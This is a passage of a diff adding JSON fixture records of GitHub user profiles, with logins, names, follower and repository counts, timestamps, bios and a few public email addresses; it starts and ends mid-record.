+ "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42475284?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2018-08-17T16:17:48Z", + "updated_at": "2024-07-26T07:43:21Z", + "node_id": "MDQ6VXNlcjQyNDc1Mjg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3128, + "fields": { + "nest_created_at": "2024-09-12T03:14:35.124Z", + "nest_updated_at": "2024-09-12T03:14:35.124Z", + "name": "Sayed Ali", + "login": "BLACK-SCORP10", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102329978?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-03-24T21:51:30Z", + "updated_at": "2024-08-30T18:53:39Z", + "node_id": "U_kgDOBhlueg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3129, + "fields": { + "nest_created_at": "2024-09-12T03:14:35.984Z", + "nest_updated_at": "2024-09-12T03:14:35.984Z", + "name": "", + "login": "TGRBirdFlying", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52350736?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 149, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-06-29T12:46:51Z", + "updated_at": "2024-04-16T07:41:24Z", + "node_id": "MDQ6VXNlcjUyMzUwNzM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3130, + "fields": { + "nest_created_at": "2024-09-12T03:14:36.829Z", + "nest_updated_at": "2024-09-12T03:16:19.118Z", + "name": "Eric Smith", + "login": "prisoner881", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38230821?v=4", + "company": "LockStep Technology Group", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-04-09T22:57:56Z", + "updated_at": "2024-01-20T23:16:12Z", + "node_id": "MDQ6VXNlcjM4MjMwODIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3131, + "fields": { + "nest_created_at": "2024-09-12T03:14:38.486Z", + "nest_updated_at": "2024-09-12T03:14:38.486Z", + "name": "koooooooooh", + "login": "RASSec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16720863?v=4", + "company": "063", + "location": "", + "collaborators_count": 0, + "following_count": 72, + "followers_count": 270, + "public_gists_count": 19, + "public_repositories_count": 1269, + "created_at": "2016-01-15T14:32:03Z", + "updated_at": "2023-10-09T13:45:17Z", + "node_id": "MDQ6VXNlcjE2NzIwODYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3132, + "fields": { + "nest_created_at": "2024-09-12T03:14:40.096Z", + "nest_updated_at": "2024-09-12T03:14:40.096Z", + "name": "Atharva Ketkar", + "login": "atharvak95", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85757680?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-06-11T16:36:57Z", + "updated_at": "2024-07-16T22:00:53Z", + "node_id": "MDQ6VXNlcjg1NzU3Njgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3133, + "fields": { + "nest_created_at": "2024-09-12T03:14:40.911Z", + "nest_updated_at": "2024-09-12T03:14:40.911Z", + "name": "", + "login": "sahadev0079", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111126595?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2022-08-12T11:45:43Z", + "updated_at": "2024-08-28T09:27:15Z", + "node_id": "U_kgDOBp-oQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3134, + "fields": { + "nest_created_at": "2024-09-12T03:14:41.753Z", + "nest_updated_at": "2024-09-22T19:32:07.994Z", + "name": "Ricardo Iramar dos Santos", + "login": "riramar", + "email": "ricardo.iramar@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6748242?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 53, + "followers_count": 328, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2014-02-21T13:38:07Z", + "updated_at": "2024-01-28T20:01:14Z", + "node_id": "MDQ6VXNlcjY3NDgyNDI=", + "bio": "Every time count is regressive.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3135, + "fields": { + "nest_created_at": "2024-09-12T03:14:42.587Z", + "nest_updated_at": "2024-09-12T03:14:42.587Z", + "name": "", + "login": "Croco-byte", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74874716?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2020-11-22T18:27:09Z", + "updated_at": "2024-06-26T21:27:26Z", + "node_id": "MDQ6VXNlcjc0ODc0NzE2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3136, + "fields": { + "nest_created_at": "2024-09-12T03:14:43.434Z", + "nest_updated_at": "2024-09-12T03:14:43.434Z", + "name": "Cedric Brisson", + "login": "cyb3rjerry", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92945113?v=4", + "company": "Coveo", + "location": "", + "collaborators_count": 0, + "following_count": 53, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2021-10-21T17:29:05Z", + "updated_at": "2024-09-04T22:12:31Z", + "node_id": "U_kgDOBYo62Q", + "bio": "Breaker of things", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3137, + "fields": { + "nest_created_at": "2024-09-12T03:14:44.257Z", + "nest_updated_at": "2024-09-12T03:14:44.257Z", + "name": "ELderblood", + "login": "ReekElderblood", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87793589?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2021-07-22T03:26:37Z", + "updated_at": "2024-08-22T07:48:59Z", + "node_id": "MDQ6VXNlcjg3NzkzNTg5", + "bio": "programmer proficient in Bash, HTML, and Python. Passionate about writing clean, efficient code and constantly improving my skills.", + "is_hireable": false, + "twitter_username": "ReekElderblood" + } +}, +{ + "model": "github.user", + "pk": 3138, + "fields": { + "nest_created_at": "2024-09-12T03:14:45.122Z", + "nest_updated_at": "2024-09-12T03:14:45.122Z", + "name": "", + "login": "fuomag9", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1580624?v=4", + "company": "", + "location": "Italy", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 28, + "public_gists_count": 12, + "public_repositories_count": 45, + "created_at": "2012-03-27T17:45:24Z", + "updated_at": "2024-08-30T21:41:01Z", + "node_id": "MDQ6VXNlcjE1ODA2MjQ=", + "bio": "Pizza developer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3139, + "fields": { + "nest_created_at": "2024-09-12T03:14:45.972Z", + "nest_updated_at": "2024-09-12T03:14:45.972Z", + "name": "Maxim Tyukov", + "login": "mfocuz", + "email": "mtyukov@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5272766?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 15, + "public_gists_count": 3, + "public_repositories_count": 7, + "created_at": "2013-08-20T19:36:01Z", + "updated_at": "2024-08-22T17:24:05Z", + "node_id": "MDQ6VXNlcjUyNzI3NjY=", + "bio": "Security researcher, CTF player, OSCP & OSWE", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3140, + "fields": { + "nest_created_at": "2024-09-12T03:14:46.779Z", + "nest_updated_at": "2024-09-12T03:14:46.779Z", + "name": "", + "login": "ntriisii", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/137733641?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-25T23:14:28Z", + "updated_at": "2023-10-12T19:21:30Z", + "node_id": "U_kgDOCDWmCQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3141, + "fields": { + "nest_created_at": "2024-09-12T03:14:47.639Z", + "nest_updated_at": "2024-09-12T03:14:47.639Z", + "name": "", + "login": "prathvi2002", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109508964?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2022-07-18T07:44:56Z", + "updated_at": "2024-09-09T14:30:24Z", + "node_id": "U_kgDOBob5ZA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3142, + "fields": { + "nest_created_at": "2024-09-12T03:14:49.263Z", + "nest_updated_at": "2024-09-12T03:14:49.263Z", + "name": "Pushpak Pawar", + "login": "pushpak-11", + "email": "pawarpushpak36@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/98308258?v=4", + "company": "", + "location": "pune maharashtra", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2022-01-24T07:42:29Z", + "updated_at": "2024-08-09T12:22:56Z", + "node_id": "U_kgDOBdwQog", + "bio": "| MERN Stack Developer | Next.js | React.js | Redux.js | TypeScript | JavaScript | Node.js | Express | Website Penetration Testing | ", + "is_hireable": false, + "twitter_username": "PushpakPawar_11" + } +}, +{ + "model": "github.user", + "pk": 3143, + "fields": { + "nest_created_at": "2024-09-12T03:14:50.908Z", + "nest_updated_at": "2024-09-12T03:14:50.908Z", + "name": "", + "login": "DuyVuong", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/125139802?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2023-02-11T14:47:46Z", + "updated_at": "2024-09-05T16:51:24Z", + "node_id": "U_kgDOB3V7Wg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3144, + "fields": { + "nest_created_at": "2024-09-12T03:14:51.725Z", + "nest_updated_at": "2024-09-12T03:14:51.725Z", + "name": "", + "login": "peteraao", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135830083?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-07T10:55:55Z", + "updated_at": "2023-10-18T07:28:08Z", + "node_id": "U_kgDOCBiaQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3145, + "fields": { + "nest_created_at": "2024-09-12T03:14:52.542Z", + "nest_updated_at": "2024-09-22T20:31:03.241Z", + "name": "", + "login": "gata-bbs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/148156217?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-10-16T21:32:14Z", + "updated_at": "2024-09-12T14:48:52Z", + "node_id": "U_kgDOCNSvOQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3146, + "fields": { + "nest_created_at": "2024-09-12T03:14:53.401Z", + "nest_updated_at": "2024-09-12T03:14:53.401Z", + "name": "Hashem Mohamed", + "login": "hashem-mo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107648396?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2022-06-16T19:50:54Z", + "updated_at": "2024-08-17T02:37:05Z", + "node_id": "U_kgDOBmqVjA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3147, + "fields": { + "nest_created_at": "2024-09-12T03:14:54.220Z", + "nest_updated_at": "2024-09-12T03:14:54.220Z", + "name": "Ludovic ROLAND", + "login": "ludovicroland", + "email": "ludovic.c.roland@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3648438?v=4", + "company": "Decathlon Technology", + "location": "Lille", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 83, + "public_gists_count": 18, + "public_repositories_count": 49, + "created_at": "2013-02-20T14:46:48Z", + "updated_at": "2024-09-01T17:25:45Z", + "node_id": "MDQ6VXNlcjM2NDg0Mzg=", + "bio": "Engineering Manager @Decathlon", + "is_hireable": false, + "twitter_username": "ludovicroland" + } +}, +{ + "model": "github.user", + "pk": 3148, + "fields": { + "nest_created_at": "2024-09-12T03:14:55.011Z", + "nest_updated_at": "2024-09-12T03:14:57.480Z", + "name": "m0uka", + "login": "m0uka-Dz", + "email": "ahmedsadam633@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/80654458?v=4", + "company": "", + "location": "algeria", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 29, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-03-15T00:06:06Z", + "updated_at": "2024-08-21T05:56:07Z", + "node_id": "MDQ6VXNlcjgwNjU0NDU4", + "bio": "", + "is_hireable": false, + "twitter_username": "m0uka_Dz" + } +}, +{ + "model": "github.user", + "pk": 3149, + "fields": { + "nest_created_at": "2024-09-12T03:14:55.843Z", + "nest_updated_at": "2024-09-12T03:14:55.843Z", + "name": "", + "login": "leogoldim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12822299?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-06-10T01:07:31Z", + "updated_at": "2024-01-30T00:58:25Z", + "node_id": "MDQ6VXNlcjEyODIyMjk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3150, + "fields": { + "nest_created_at": "2024-09-12T03:14:56.672Z", + "nest_updated_at": "2024-09-12T03:14:56.672Z", + "name": "", + "login": "Done461", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52113967?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-06-22T21:29:04Z", + "updated_at": "2024-06-01T17:34:24Z", + "node_id": "MDQ6VXNlcjUyMTEzOTY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3151, + "fields": { + "nest_created_at": "2024-09-12T03:14:58.342Z", + "nest_updated_at": "2024-09-12T03:14:58.342Z", + "name": "", + "login": "midjarmaksor", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46574468?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2019-01-10T18:29:27Z", + "updated_at": "2024-06-06T23:26:19Z", + "node_id": "MDQ6VXNlcjQ2NTc0NDY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3152, + "fields": { + "nest_created_at": "2024-09-12T03:14:59.171Z", + "nest_updated_at": "2024-09-12T03:14:59.171Z", + "name": "", + "login": "kz0ltan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37075997?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-03-05T14:22:18Z", + "updated_at": "2024-06-01T13:31:55Z", + "node_id": "MDQ6VXNlcjM3MDc1OTk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3153, + "fields": { + "nest_created_at": "2024-09-12T03:15:00.022Z", + "nest_updated_at": "2024-09-12T03:15:00.022Z", + "name": "", + "login": "Captain-Archibald-Haddock", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152749730?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-12-02T23:53:42Z", + "updated_at": "2023-12-02T23:57:00Z", + "node_id": "U_kgDOCRrGog", + "bio": "Cybersecurity Researcher! Offensive Security!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3154, + "fields": { + "nest_created_at": "2024-09-12T03:15:02.614Z", + "nest_updated_at": "2024-09-12T03:15:02.614Z", + "name": "", + "login": "paillp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68086605?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-07-09T22:45:36Z", + "updated_at": "2024-01-31T09:32:57Z", + "node_id": "MDQ6VXNlcjY4MDg2NjA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3155, + "fields": { + "nest_created_at": "2024-09-12T03:15:03.464Z", + "nest_updated_at": "2024-09-12T03:15:03.464Z", + "name": "Douglas S. Santos", + "login": "dogasantos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4156021?v=4", + "company": "", + "location": "Brazil, São Paulo", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 20, + "public_gists_count": 3, + "public_repositories_count": 140, + "created_at": "2013-04-15T01:51:51Z", + "updated_at": "2024-05-24T03:29:00Z", + "node_id": "MDQ6VXNlcjQxNTYwMjE=", + "bio": "IM NOT A DEVELOPER. STOP INVITING ME FOR POSITIONS IN THIS FIELD.\r\nhttps://www.linkedin.com/in/dsecco/", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3156, + "fields": { + "nest_created_at": "2024-09-12T03:15:04.303Z", + "nest_updated_at": "2024-09-12T03:15:04.303Z", + "name": "Halim Jabbes", + "login": "hxlxmjxbbxs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96540322?v=4", + "company": "Wezoom", + "location": "Montreal, CA", + "collaborators_count": 0, + "following_count": 157, + "followers_count": 32, + "public_gists_count": 33, + "public_repositories_count": 1697, + "created_at": "2021-12-22T16:20:46Z", + "updated_at": "2024-09-04T05:30:23Z", + "node_id": "U_kgDOBcEWog", + "bio": "My passion and profession lie in cybersecurity, with a focus on its offensive aspects. I'm dedicated to exploring the latest trends and techniques.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3157, + "fields": { + "nest_created_at": "2024-09-12T03:15:05.135Z", + "nest_updated_at": "2024-09-12T03:15:05.135Z", + "name": "", + "login": "Nzoth9", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67303734?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-06-23T03:39:31Z", + "updated_at": "2024-08-26T22:06:05Z", + "node_id": "MDQ6VXNlcjY3MzAzNzM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3158, + "fields": { + "nest_created_at": "2024-09-12T03:15:05.967Z", + "nest_updated_at": "2024-09-12T03:15:05.967Z", + "name": "Muxue", + "login": "secxue", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89639483?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-08-27T10:45:30Z", + "updated_at": "2024-08-15T13:22:11Z", + "node_id": "MDQ6VXNlcjg5NjM5NDgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3159, + "fields": { + "nest_created_at": "2024-09-12T03:15:06.810Z", + "nest_updated_at": "2024-09-12T03:15:06.810Z", + "name": "", + "login": "igaralf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25309860?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-01-23T22:06:23Z", + "updated_at": "2024-05-10T20:27:40Z", + "node_id": "MDQ6VXNlcjI1MzA5ODYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3160, + "fields": { + "nest_created_at": "2024-09-12T03:15:08.500Z", + "nest_updated_at": "2024-09-12T03:15:08.500Z", + "name": "", + "login": "Suryanshuraghav007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109915850?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-07-24T16:39:32Z", + "updated_at": "2023-12-04T18:55:46Z", + "node_id": "U_kgDOBo0uyg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3161, + "fields": { + "nest_created_at": "2024-09-12T03:15:09.324Z", + "nest_updated_at": "2024-09-12T03:15:09.324Z", + "name": "Rami", + "login": "Raammi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/155196952?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2023-12-29T21:21:44Z", + "updated_at": "2024-08-20T23:32:10Z", + "node_id": "U_kgDOCUAeGA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3162, + "fields": { + "nest_created_at": "2024-09-12T03:15:10.168Z", + "nest_updated_at": "2024-09-12T03:15:10.168Z", + "name": "Ramin", + "login": "Turboramin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43754521?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-10-01T15:03:09Z", + "updated_at": "2024-08-18T11:43:39Z", + "node_id": "MDQ6VXNlcjQzNzU0NTIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3163, + "fields": { + "nest_created_at": "2024-09-12T03:15:11.034Z", + "nest_updated_at": "2024-09-12T03:15:11.034Z", + "name": "Prince William", + "login": "iprincs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/99089001?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-02-05T16:33:59Z", + "updated_at": "2024-03-08T09:12:41Z", + "node_id": "U_kgDOBef6aQ", + "bio": "HACKER", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3164, + "fields": { + "nest_created_at": "2024-09-12T03:15:11.870Z", + "nest_updated_at": "2024-09-12T03:15:13.614Z", + "name": "Dzenan Palavra", + "login": "dpalavra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82952643?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-04-21T13:21:51Z", + "updated_at": "2024-07-15T14:54:29Z", + "node_id": "MDQ6VXNlcjgyOTUyNjQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3165, + "fields": { + "nest_created_at": "2024-09-12T03:15:12.748Z", + "nest_updated_at": "2024-09-12T03:15:12.748Z", + "name": "", + "login": "stephen-devops", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136968848?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-18T10:48:01Z", + "updated_at": "2024-09-10T11:38:50Z", + "node_id": "U_kgDOCCn6kA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3166, + "fields": { + "nest_created_at": "2024-09-12T03:15:14.468Z", + "nest_updated_at": "2024-09-12T03:15:14.468Z", + "name": "Syed Ahmad Mujtaba", + "login": "mujtabasec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72700323?v=4", + "company": "", + "location": "Pakistan", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2020-10-11T15:11:49Z", + "updated_at": "2024-08-12T11:54:22Z", + "node_id": "MDQ6VXNlcjcyNzAwMzIz", + "bio": "Security Researcher | Pentester | Bug Bounty Hunter | Hack3r\r\n", + "is_hireable": true, + "twitter_username": "mujtabasec" + } +}, +{ + "model": "github.user", + "pk": 3167, + "fields": { + "nest_created_at": "2024-09-12T03:15:15.303Z", + "nest_updated_at": "2024-09-12T03:15:15.303Z", + "name": "", + "login": "677230756E64", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/130088857?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2023-04-06T17:39:42Z", + "updated_at": "2024-04-29T16:44:52Z", + "node_id": "U_kgDOB8D_mQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3168, + "fields": { + "nest_created_at": "2024-09-12T03:15:16.150Z", + "nest_updated_at": "2024-09-12T03:15:16.150Z", + "name": "", + "login": "hudsonrock-partnerships", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/163282900?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2024-03-13T08:53:11Z", + "updated_at": "2024-08-18T18:03:38Z", + "node_id": "U_kgDOCbt_1A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3169, + "fields": { + "nest_created_at": "2024-09-12T03:15:17.030Z", + "nest_updated_at": "2024-09-12T03:15:17.030Z", + "name": "", + "login": "manguy0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/173408683?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-06-20T20:52:15Z", + "updated_at": "2024-06-20T21:29:16Z", + "node_id": "U_kgDOClYBqw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3170, + "fields": { + "nest_created_at": "2024-09-12T03:15:17.843Z", + "nest_updated_at": "2024-09-12T03:15:17.844Z", + "name": "VER007", + "login": "ver007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4726296?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 152, + "followers_count": 125, + "public_gists_count": 1, + "public_repositories_count": 801, + "created_at": "2013-06-18T07:58:13Z", + "updated_at": "2024-08-10T12:14:15Z", + "node_id": "MDQ6VXNlcjQ3MjYyOTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3171, + "fields": { + "nest_created_at": "2024-09-12T03:15:18.643Z", + "nest_updated_at": "2024-09-12T03:15:18.643Z", + "name": "", + "login": "tlimlam", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121858741?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-03T09:16:19Z", + "updated_at": "2024-06-28T17:26:05Z", + "node_id": "U_kgDOB0NqtQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3172, + "fields": { + "nest_created_at": "2024-09-12T03:15:19.479Z", + "nest_updated_at": "2024-09-12T03:15:20.297Z", + "name": "小健健", + "login": "m4ra7h0n", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71647398?v=4", + "company": "Xiaomi Inc.", + "location": "nanjing", + "collaborators_count": 0, + "following_count": 74, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 36, + "created_at": "2020-09-21T12:55:34Z", + "updated_at": "2024-09-05T12:23:21Z", + "node_id": "MDQ6VXNlcjcxNjQ3Mzk4", + "bio": "a easy man\r\n\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3173, + "fields": { + "nest_created_at": "2024-09-12T03:15:21.120Z", + "nest_updated_at": "2024-09-12T03:15:21.120Z", + "name": "", + "login": "marcelo321", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29487296?v=4", + "company": "", + "location": "", + 